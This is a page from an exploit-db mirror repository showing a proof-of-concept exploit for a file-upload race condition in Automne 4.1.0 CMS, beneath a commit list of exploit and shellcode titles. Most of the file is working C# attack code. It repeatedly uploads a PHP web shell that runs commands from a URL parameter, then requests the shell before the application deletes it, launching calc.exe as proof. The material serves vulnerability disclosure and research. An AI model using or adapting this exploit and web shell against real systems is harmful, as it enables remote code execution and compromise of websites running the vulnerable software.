bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35417.php
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

144 lines
No EOL
4.5 KiB
PHP
Raw Blame History

source: https://www.securityfocus.com/bid/46774/info
Automne is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Automne 4.1.0 is vulnerable; other versions may also be affected.
Home Software Services Advisories Contact
Automne 4.1.0 Race Condition
// ------------------------------------------------------------------------
// Software................Automne 4.1.0
// Vulnerability...........Race Condition
// Threat Level............Very Critical (5/5)
// Download................http://en.automne-cms.org/
// Release Date............3/6/2011
// Tested On...............Windows Vista + XAMPP
// ------------------------------------------------------------------------
// Author..................AutoSec Tools
// Site....................http://www.autosectools.com/
// Email...................John Leitch <john@autosectools.com>
// ........................Bryce Darling <bryce@autosectools.com>
// ------------------------------------------------------------------------
//
//
// --Description--
//
// A race condition in Automne 4.1.0 can be exploited to bypass
// validation performed on uploaded files. The following proof of concept
// uploads a PHP script and then attempts to execute it before it is deleted.
//
//
// --PoC--
using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;
using System.Diagnostics;
using System.Net.Sockets;
namespace RaceConditionExploit
{
class Program
{
static bool trying = true;
static void SendReq(string req)
{
try
{
var bytes = ASCIIEncoding.ASCII.GetBytes(req);
var client = new TcpClient();
client.Connect("localhost", 80);
using (var stream = client.GetStream())
stream.Write(bytes, 0, bytes.Length);
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
static void CheckForCalc()
{
if (Process.GetProcessesByName("calc").Length != 0)
trying = false;
}
static void Main()
{
var resets = new[]
{
new ManualResetEvent(false),
new ManualResetEvent(false),
new ManualResetEvent(false),
};
ThreadPool.QueueUserWorkItem(x =>
{
resets[0].WaitOne();
while (trying)
{
SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 193
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""
Content-Type: application/octet-stream
<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--
");
CheckForCalc();
}
resets[1].Set();
});
ThreadPool.QueueUserWorkItem(x =>
{
resets[0].WaitOne();
while (trying)
{
SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1
Host: localhost
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0
");
CheckForCalc();
}
resets[2].Set();
});
resets[0].Set();
resets[1].WaitOne();
resets[2].WaitOne();
}
}
}
Reference in a new issue View git blame Copy permalink